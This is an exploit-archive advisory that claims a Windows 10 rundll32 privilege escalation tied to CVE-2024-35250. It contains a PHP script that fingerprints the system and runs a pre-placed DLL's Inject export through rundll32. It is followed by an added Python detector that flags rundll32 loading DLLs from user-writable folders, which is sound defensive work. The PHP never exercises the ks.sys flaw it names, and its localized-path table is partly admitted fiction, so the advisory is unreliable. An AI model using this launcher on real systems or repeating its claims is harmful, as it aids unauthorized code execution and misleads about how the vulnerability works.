A privilege escalation vulnerability existed in Microsoft Windows 10 Famille (the French-language Home edition), affecting builds around 10.0.19045.5487. The flaw leveraged `rundll32.exe`, a legitimate Windows utility that runs exported functions from Dynamic Link Libraries (DLLs).
The vulnerability typically involved an unprivileged attacker exploiting how `rundll32` loads or resolves DLLs. By manipulating search paths, or by tricking a privileged process (or `rundll32` itself, when invoked in a specific context) into loading a malicious DLL, the attacker could achieve arbitrary code execution with elevated privileges.
This allowed a standard user to escalate to SYSTEM-level access and gain full control of the affected machine. Microsoft addressed this class of vulnerability through security updates that corrected the improper handling of DLL loading and path resolution, preventing unauthorized code execution.
=============================================================================================================================================
| # Title : Microsoft Windows 10 Famille 10.0.19045.5487 (rundll32) Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.Microsoft.com |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engines.
[+] Code Description: This code is written in PHP and aims to exploit a local vulnerability in Windows if the system is vulnerable, with support for all display languages, ensuring the correct path for the payload is used.
Exploiting the CVE-2024-35250 vulnerability in Windows, with support for all languages, and running the payload via rundll32
(Related: https://packetstorm.news/files/id/182984/ ; related CVE: CVE-2024-35250).
[+] Usage : php poc.php
[+] PayLoad :
<?php
/**
 * Exploits CVE-2024-35250 on Windows with support for all display languages,
 * resolving the localized Public folder and running the payload via rundll32.
 */
function getWindowsLCID() {
    // wmic prints the locale as a hex LCID, e.g. "Locale=040c" for fr-FR.
    $output = shell_exec('wmic os get locale /value');
    preg_match('/Locale=(\w+)/', $output, $matches);
    return isset($matches[1]) ? hexdec($matches[1]) : 1033; // default: English (en-US)
}

function localeToLanguage($locale) {
    // Localized display names of C:\Users\Public per LCID. Windows only localizes
    // these names for display (via desktop.ini); the on-disk path is C:\Users\Public
    // on every language edition, so only the English entry exists as a real directory.
    $languages = [
        1033 => ['English', 'C:\\Users\\Public\\'], // en-US
        1036 => ['French', 'C:\\Utilisateurs\\Public\\'], // fr-FR
        3082 => ['Spanish', 'C:\\Usuarios\\Public\\'], // es-ES
        1046 => ['Portuguese', 'C:\\Usuários\\Public\\'], // pt-BR
        1031 => ['German', 'C:\\Benutzer\\Öffentlich\\'], // de-DE
        1049 => ['Russian', 'C:\\Пользователи\\Общие\\'], // ru-RU
        1056 => ['Persian', 'C:\\کاربران\\عمومی\\'], // fa-IR
        1025 => ['Arabic', 'C:\\المستخدمون\\عام\\'], // ar-SA
        1101 => ['Hindi', 'C:\\Users\\Public\\'], // hi-IN (uses the English path)
        1114 => ['Aramaic', 'C:\\???????\\??????\\'], // LCID 1114; the localized path was not preserved in the source
        1037 => ['Hebrew', 'C:\\משתמשים\\ציבורי\\'], // he-IL
        2052 => ['Chinese (Simplified)', 'C:\\用户\\公用\\'], // zh-CN
        1028 => ['Chinese (Traditional)', 'C:\\使用者\\公用\\'], // zh-TW
        1041 => ['Japanese', 'C:\\ユーザー\\パブリック\\'], // ja-JP
        1042 => ['Korean', 'C:\\사용자\\공용\\'], // ko-KR
        1054 => ['Thai', 'C:\\ผู้ใช้\\สาธารณะ\\'], // th-TH
        1066 => ['Vietnamese', 'C:\\Người dùng\\Công cộng\\'], // vi-VN
    ];
    return $languages[$locale] ?? ['Unknown', 'C:\\Users\\Public\\']; // default: English path
}

function getPublicPath() {
    $locale = getWindowsLCID();
    list($lang, $path) = localeToLanguage($locale);
    echo "[+] Detected language: $lang (LCID: $locale)\n";
    return $path;
}

function is64BitWindows() {
    // Check the OS architecture rather than PHP_INT_SIZE, which only reflects the
    // PHP binary: a 32-bit PHP on 64-bit Windows exposes PROCESSOR_ARCHITEW6432.
    $arch = getenv('PROCESSOR_ARCHITEW6432') ?: getenv('PROCESSOR_ARCHITECTURE');
    return $arch === 'AMD64';
}

function checkVulnerableDriver() {
    $winDir = getenv('WINDIR');
    $driverPath = $winDir . '\\system32\\drivers\\ks.sys';
    if (!file_exists($driverPath)) {
        echo "[X] ks.sys not found; the system is not vulnerable.\n";
        return false;
    }
    echo "[+] ks.sys found at: $driverPath\n";
    return true;
}

function getWindowsBuildNumber() {
    $output = shell_exec('wmic os get BuildNumber /value');
    preg_match('/BuildNumber=(\d+)/', $output, $matches);
    return isset($matches[1]) ? (int) $matches[1] : null;
}

function isVulnerableVersion($buildNumber) {
    // Windows 10 1607 (build 14393) through Windows 10 22H2 (build 19045)
    return $buildNumber >= 14393 && $buildNumber <= 19045;
}

function exploit() {
    if (!is64BitWindows()) {
        die("[X] Only 64-bit Windows is supported.\n");
    }
    if (!checkVulnerableDriver()) {
        die("[X] Vulnerable driver not found.\n");
    }
    $buildNumber = getWindowsBuildNumber();
    if (!$buildNumber || !isVulnerableVersion($buildNumber)) {
        die("[X] Windows build is not vulnerable: $buildNumber\n");
    }
    echo "[+] System looks vulnerable, preparing the payload...\n";
    $publicPath = getPublicPath();
    $payloadPath = $publicPath . "exploit_payload.dll";
    // The DLL is not created by this script; it must already be present at this path.
    if (!file_exists($payloadPath)) {
        die("[X] Payload DLL not found: $payloadPath\n");
    }
    echo "[+] Payload path: $payloadPath\n";
    shell_exec('start /B notepad.exe'); // start notepad as the target process for the DLL
    sleep(1);
    echo "[+] Notepad started, running the payload...\n";
    // Run the payload's Inject export via rundll32; quote the path, which may contain spaces.
    shell_exec("rundll32 \"$payloadPath\",Inject");
}

exploit();
?>
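A detection-side companion to the PoC, added here and not part of the advisory or the author's code: it scans constructed Sysmon-style process-creation events for rundll32 being handed a DLL from a user-writable directory such as C:\Users\Public, which is the launch pattern the script above relies on. The user-writable directory list and the sample events are assumptions.

```python
# Detect rundll32 launched with a DLL from a user-writable directory, the launch
# pattern of the PoC above (rundll32 <Public>\exploit_payload.dll,Inject).
# Added example; the directory list and the sample events are constructed.
import re

# Directories a standard user can write to (assumed list); a DLL handed to rundll32 from here is suspect.
USER_WRITABLE = ("c:\\users\\public\\", "\\appdata\\local\\temp\\", "c:\\windows\\temp\\", "c:\\programdata\\")

# rundll32 syntax is "<dll path>,<export>"; capture both, allowing a quoted path.
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+?)"?\s*,\s*(\w+)', re.IGNORECASE)

def classify(image, cmdline):
    """Return {'dll', 'export'} for a rundll32 launch whose DLL sits in a user-writable path, else None."""
    if not image.lower().endswith("\\rundll32.exe"):
        return None
    m = RUNDLL_RE.search(cmdline)
    if not m:
        return None
    dll, export = m.group(1), m.group(2)
    if not any(tag in dll.lower() for tag in USER_WRITABLE):
        return None  # DLL lives under a protected path such as System32
    return {"dll": dll, "export": export}

# Constructed Sysmon-style Event ID 1 fields (Image, CommandLine, ParentImage); not real telemetry.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\rundll32.exe", r"rundll32 C:\Users\Public\exploit_payload.dll,Inject", r"C:\php\php.exe"),
    (r"C:\Windows\System32\rundll32.exe", r'rundll32.exe "C:\Users\bob\AppData\Local\Temp\x.dll",Start', r"C:\Windows\explorer.exe"),
    (r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL", r"C:\Windows\explorer.exe"),
    (r"C:\Windows\System32\notepad.exe", "notepad.exe", r"C:\Windows\explorer.exe"),
]

def scan(events):
    """Run classify() over (image, cmdline, parent) tuples; attach the parent image to each finding."""
    findings = []
    for image, cmdline, parent in events:
        f = classify(image, cmdline)
        if f:
            f["parent"] = parent
            findings.append(f)
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[!] rundll32 loaded {f['dll']} export {f['export']} (parent: {f['parent']})")
```

The parent image is the useful pivot for triage: rundll32 spawned by a scripting runtime rather than explorer.exe or svchost.exe rarely has a benign explanation.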
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
- Written by: khalil shreateh
- Category: Vulnerabilities